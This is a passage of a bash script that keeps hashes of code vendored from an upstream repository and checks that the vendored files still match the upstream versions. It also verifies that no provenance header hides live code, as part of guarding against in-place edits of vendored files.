	done < <(jq -r '.vendored[] | [.path, (.body_sha256 // ""), (.header_sha256 // "")] | @tsv' "$MANIFEST")

	while IFS=$'\t' read -r path old; do
		f="$VENDOR_ROOT/$path"
		[[ -f "$f" ]] || { echo "skip (missing): $f" >&2; continue; }
		new=$(sha_of_file "$f")
		if [[ "$new" != "$old" ]]; then
			echo "file_sha256 $path"; echo "  - $old"; echo "  + $new"
			changed=1
			jq --arg p "$path" --arg h "$new" \
				'.verbatim |= map(if .path == $p then .file_sha256 = $h else . end)' "$tmp" >"$tmp.n" && mv "$tmp.n" "$tmp"
		fi
	done < <(jq -r '.verbatim[] | [.path, (.file_sha256 // "")] | @tsv' "$MANIFEST")

	cp "$tmp" "$MANIFEST"
	if (( changed )); then
		echo >&2
		echo "Content hashes changed. A hash that moves without its tag/sha moving is an" >&2
		echo "in-place edit of a vendored file, which is the one thing this whole setup" >&2
		echo "exists to prevent — and CI now reads for it directly:" >&2
		echo "    $0 check-diff @<pr-base-ref>" >&2
		echo "goes red on exactly that combination, so an absorption has to move the pin" >&2
		echo "too. Before pushing, also run" >&2
		echo "    $0 verify-upstream <clone-of-upstream>" >&2
		echo "See step 4 of docs/vendoring-cloudcli.md." >&2
		exit 1
	fi
	echo "OK: no hash changes"
	;;

verify-upstream)
	# The assertion `check` cannot make: that the hashes recorded in the
	# manifest are the hashes of what upstream actually published at that SHA.
	# Everything offline only proves our copy still matches our own record of
	# it — this proves the record itself is true.
	clone=${2:-}
	[[ -n "$clone" && -d "$clone/.git" ]] || {
		echo "usage: $0 verify-upstream <path-to-upstream-clone>" >&2
		echo "  git clone https://github.com/siteboon/claudecodeui /tmp/ccui" >&2
		echo "  (full clone, not --depth 1: this mode reads each entry's blob at that" >&2
		echo "   entry's own sha, and the manifest is allowed to span several pins)" >&2
		exit 2; }

	n=0; n_detached=0
	while IFS=$'\t' read -r path up_path sha kind status declared_hash detached_from; do
		f="$VENDOR_ROOT/$path"
		[[ -f "$f" ]] || { red "declared file is missing: $f"; continue; }

		# A detached file is *expected* to differ from upstream — that is what
		# detached means. Comparing it against upstream and failing would red this
		# mode permanently from the first legitimate detachment onward, which is
		# how a gate becomes something people run past. So the assertion changes
		# shape rather than being skipped: for a detached file we verify that the
		# SHA it claims to have forked from really carries that path, i.e. that
		# its provenance is real, and we report the divergence without failing.
		if [[ "$status" == detached ]]; then
			ref=$detached_from
			[[ -n "$ref" ]] || { red "$path is detached but has no detached_from_sha"; continue; }
		else
			ref=$sha
		fi

		if ! git -C "$clone" cat-file -e "$ref:$up_path" 2>/dev/null; then
			red "upstream clone has no '$up_path' at $ref"
			echo "      (a --depth 1 clone only carries the one tag it was cloned at;" >&2
			echo "       re-clone without --depth if the manifest spans several pins)" >&2
			continue
		fi
		up_hash=$(git -C "$clone" show "$ref:$up_path" | sha256sum | cut -d' ' -f1)

		if [[ "$kind" == vendored ]]; then
			end=$(header_end_line "$f")
			[[ -n "$end" ]] || { red "$f has no header terminator"; continue; }
			# Assertion E again, here and not only in `check`, because this mode
			# is the one that prints "byte-identical to the upstream blobs they
			# name". That sentence is about the whole file as a reader will read
			# it, and it is false the moment the region above the terminator
			# contains anything but comment — the body can be byte-identical to
			# upstream while the file as a whole runs code upstream never shipped.
			# A gate that emits a false statement is worse than no gate.
			why=$(header_region_violation "$f" "$end")
			[[ -z "$why" ]] || {
				red "$f: provenance header region is not a single block comment: $why"
				echo "      Not comparing this file against upstream: the comparison would be" >&2
				echo "      of upstream's bytes only, and reporting it as 'byte-identical'" >&2
				echo "      would be a false claim about a file that carries live code." >&2
				continue; }
			local_hash=$(sha_of_body "$f" "$end")
		else
			local_hash=$(sha_of_file "$f")
		fi

		if [[ "$status" == detached ]]; then
			echo "  det $path  <-  $up_path @ ${ref:0:7}  (forked; local ${local_hash:0:12} vs upstream ${up_hash:0:12})"
			n_detached=$((n_detached+1))
		elif [[ "$up_hash" != "$declared_hash" ]]; then
			red "$path: manifest hash is not what upstream published at $ref"
			echo "        manifest: $declared_hash" >&2
			echo "        upstream: $up_hash" >&2
			echo "      The record itself is wrong. Either the file was edited in place and" >&2
			echo "      rehashed, or the wrong SHA was recorded." >&2
		elif [[ "$local_hash" != "$up_hash" ]]; then
			red "$path: local copy differs from upstream $ref:$up_path"
			echo "        local:    $local_hash" >&2
			echo "        upstream: $up_hash" >&2
		else
			echo "  ok  $path  <-  $up_path @ ${ref:0:7}  ${up_hash:0:16}"
		fi
		n=$((n+1))
	done < <(jq -r '(.vendored[] | [.path, .upstream_path, .sha, "vendored", .status, .body_sha256, (.detached_from_sha // "")])
	              , (.verbatim[] | [.path, .upstream_path, .sha, "verbatim", .status, .file_sha256, ""])
	              | @tsv' "$MANIFEST")

	if (( n == 0 )); then red "verified nothing — the manifest is empty"; fi
	if (( fail )); then
		echo >&2
		echo "Vendored content does not match the upstream blobs it claims to come from." >&2
		exit 1
	fi
	echo "OK: $(( n - n_detached )) of $n file(s) byte-identical to the upstream blobs they name;" \
	     "$n_detached detached (forked on purpose, provenance confirmed)"
	;;

*)
	echo "usage: $0 [check|check-diff <base> [head]|rehash|verify-upstream <clone>]" >&2
	exit 2
	;;
esac
